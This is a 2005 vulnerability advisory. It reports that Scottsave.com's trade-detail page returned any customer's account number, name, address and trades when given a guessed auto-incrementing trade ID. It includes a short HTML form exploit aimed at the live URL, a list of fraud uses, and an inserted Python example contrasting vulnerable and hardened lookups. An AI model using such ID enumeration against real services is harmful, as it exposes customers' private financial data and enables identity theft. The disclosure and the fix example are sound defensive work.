
Scottsave.com Trade History Exploit




*****************************************************************************
                    SCOTTSAVE.COM TRADE HISTORY EXPLOIT
*****************************************************************************
 RISK TO CUSTOMER
 Extremely High

***********
 BACKGROUND
 Scottrade, Inc. is a discount online brokerage firm with over 1.4 million
 customers. Scottrade began online trading in 1996 and has received high
 satisfaction ratings since the release of their online trading application
 called Scottrader.

********
 SUMMARY
 A serious vulnerability exists in the Trade History feature of the
 Scottsave.com website allowing an anonymous third party to gain
 confidential information about customers and their trading habits.
 The information available could be used to perform identity theft,
 fraud, and other possibly criminal actions through social engineering.

**************
 PREREQUISITES
 None

******************
 TECHNICAL DETAILS
 Scottrade provides web-based access to customer trade history
 through the Scottsave.com website which requires a valid username
 and password to access.

 All trades recorded by Scottrade are assigned an auto-incrementing
 identifier in their database.  Normally a customer browses their
 entire trade history summary and then clicks a FORM submit button
 that brings up details on individual trades.

 The page that provides trade details is:
 https://www1.scottsave.com/Scripts/Confirms.dll?DisplayPage

 On this page, the following information is displayed:
  - Scottrade Account Number
  - Account Holder Name
  - Account Holder Address (at the time of execution)
  - Trading Symbol
  - Security Description (Name of the company being traded)
  - Trade Number
  - Account Type (Broker Dealer, Cash, Margin, Short, etc)
  - Market of Execution (Over-the-Counter, NYSE, Nasdaq, etc)
  - Capacity in which Scottrade acted
  - Account Instructions (Hold Funds in Account, Mail Security, etc)
  - Trade Date
  - Settlement Date
  - Office Code
  - Action (Buy or Sell)
  - Quantity (# of shares traded)
  - CUSIP Number
  - Coupon Maturity
  - Price
  - Principal
  - Commission Paid
  - State Tax / Interest
  - SEC Fee
  - Trans Fee
  - Misc Fees
  - Interest
  - Net Amount
  - Additional Information (Text field used to specify any additional info)

 This information can be retrieved by performing an HTTP POST to:
   https://www1.scottsave.com/Scripts/Confirms.dll?Summary?OPTIMIZED=
 The only field required during this post is named "ID1234567" and the
 value is the string "Details" where 1234567 is an ID number used to
 identify your trade.

 Because the ID number appears to be an auto-incrementing value, one can
 easily guess an entire range of valid trade numbers. One can systematically
 retrieve records from all trades made, collecting the above information
 about each customer.
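 The missing authorization check described above, modelled as an added example
 (this is not Scottrade's code; the table, account numbers and the parsing of the
 "ID<n>=Details" form field are constructed assumptions): the lookup as the
 advisory reports it, beside a hardened lookup that scopes the query to the
 authenticated account.

```python
import re
import sqlite3

# Constructed sample data (account numbers and holder names are made up):
# trades keyed by the auto-incrementing id the advisory describes.
def build_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE trades (id INTEGER PRIMARY KEY, account TEXT,"
               " holder TEXT, symbol TEXT, qty INTEGER)")
    db.executemany("INSERT INTO trades VALUES (?,?,?,?,?)", [
        (1234567, "ACCT-0001", "A. Holder", "XYZ", 100),
        (1234568, "ACCT-0002", "B. Holder", "ABC", 50),
    ])
    return db

# The trade id travels in the field *name* ("ID1234567"), the value is "Details".
FIELD_RE = re.compile(r"^ID(\d+)$")

def trade_id_from_form(form):
    """Pull the trade id out of the submitted form; None if no such field."""
    for name, value in form.items():
        m = FIELD_RE.match(name)
        if m and value == "Details":
            return int(m.group(1))
    return None

def vulnerable_details(db, form, session_account):
    """Behaviour the advisory reports: any valid id returns the record and the
    authenticated account (session_account) is never consulted."""
    tid = trade_id_from_form(form)
    return db.execute("SELECT id, account, holder, symbol, qty FROM trades"
                      " WHERE id = ?", (tid,)).fetchone()

def hardened_details(db, form, session_account):
    """Fix: bind the lookup to the authenticated account in the query itself,
    and answer 'not found' identically for missing and foreign ids."""
    tid = trade_id_from_form(form)
    if tid is None:
        return None
    return db.execute("SELECT id, account, holder, symbol, qty FROM trades"
                      " WHERE id = ? AND account = ?",
                      (tid, session_account)).fetchone()
```

 The hardened form still accepts guessable ids; the point is that a guessed id
 belonging to another account now yields nothing rather than that customer's record.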

 Someone with malicious intent could possibly use the obtained info to:
  - Gain detailed trading habit analysis of individual customers
  - Gain private personal information about Scottrade customers
  - Impersonate Scottrade customers and possibly be able to socially engineer
    the wiring of money from the account into a private bank account of
    another
  - Enumerate valid Account Numbers for use in the Scottrader Applet exploit
  - And many other possible things...

****************
 EXAMPLE EXPLOIT
 The exploit is extremely simple to execute for even an inexperienced user.
 To use this exploit, simply create an html file containing the following.


<html><head>
<base href="https://www1.scottsave.com/Scripts/Confirms.dll?Summary?OPTIMIZED=">
</head>
<body>
<form action="Confirms.dll?DisplayPage" method="post" name="frmHeader">
<input type="submit" value="Details" name="ID1234567">
</form></body></html>


*******
 STATUS
 Scottrade was contacted January 3rd, 2005.  Scottrade was provided
 vulnerability details the evening of January 24th, 2005.

 A coordinated disclosure would have been ideal, but Scottrade has
 ignored all communications from me since January 24th.  I believe
 enough time has elapsed that the security holes reported have now
 been corrected.

 For more information, contact Scottrade at (800) 619-7283.

**************
 PERSONAL RANT
 As a previously happy customer of Scottrade, I am also a victim
 of the issues discussed.  I am not satisfied with Scottrade's
 response (actually, a lack thereof) when attempting to report
 the issue and hope that making it public will ensure that
 it is properly addressed and the timely notifications are sent
 to customers affected.

******************
 LEGAL INFORMATION
 The information provided is subject to change at any time without
 notification.  This information is believed to be correct.
 The reporter of this issue shall not be held liable for any
 downtime, lost profits, or damages due to this report
 or the issues contained within it.

*****************************************************************************